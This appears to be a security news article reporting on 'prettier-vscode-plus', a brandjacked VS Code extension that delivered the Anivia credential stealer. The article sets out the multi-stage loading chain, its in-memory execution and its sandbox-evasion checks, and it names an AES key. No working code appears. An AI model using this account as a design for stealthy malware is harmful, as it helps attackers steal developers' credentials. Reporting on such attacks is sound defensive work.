A dangerous malware campaign has targeted thousands of developers through a fake extension on the Visual Studio Code Marketplace.
On November 21, 2025, security researchers discovered a malicious extension named “prettier-vscode-plus” designed to trick developers into installing it by mimicking the legitimate Prettier code formatter.
The extension exploited brand recognition and targeted developers seeking formatting tools, posing a serious threat to the development community.
The malicious extension operated as a brandjacking attack, using a nearly identical name and appearance to the genuine Prettier extension to deceive users into downloading it.
This type of attack is particularly effective because developers often trust popular extensions they recognize.
Checkmarx security researchers identified and reported the extension quickly, leading to its removal within four hours of publication.
Despite the rapid response, the extension managed to accumulate six downloads and three installations before being taken down from the marketplace.
Checkmarx security analysts identified that the extension deployed a variant of the Anivia Stealer malware, a credential-stealing tool designed to harvest sensitive information from Windows systems.
The malware specifically targeted login credentials, metadata, and private communications, including WhatsApp chats.
This discovery revealed a sophisticated and well-coordinated attack aimed at compromising developer accounts and stealing valuable authentication data.
Multi-Stage Attack Infrastructure and Evasion Tactics
The malware employed a multi-stage deployment process designed to evade detection by common security tools. The first stage involved acquiring payload data as a base64-encoded blob from a GitHub repository, then writing VBScript code to the system’s temporary directory for execution.
The VBS script functioned as a bootstrap mechanism, triggering PowerShell commands that decrypted the blob using an AES encryption key (AniviaCryptKey2024!32ByteKey!HXX) directly in memory without writing files to disk.
This approach significantly reduced detectable forensic artifacts, making the attack harder for endpoint security systems to track.
The final stage employed Reflection.AssemblyLoad to execute the decrypted binary from memory, calling the entry point “Anivia.AniviaCRT” to activate the stealer functionality.
This technique left minimal evidence of infection, with temporary file presence being the only notable disk activity. Additionally, the malware implemented advanced evasion techniques by detecting sandbox environments, checking for small CPU counts and limited RAM availability to avoid triggering in detonation chambers.
The sophisticated architecture demonstrated skilled threat actors developing an attack specifically designed to bypass endpoint detection and response solutions.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
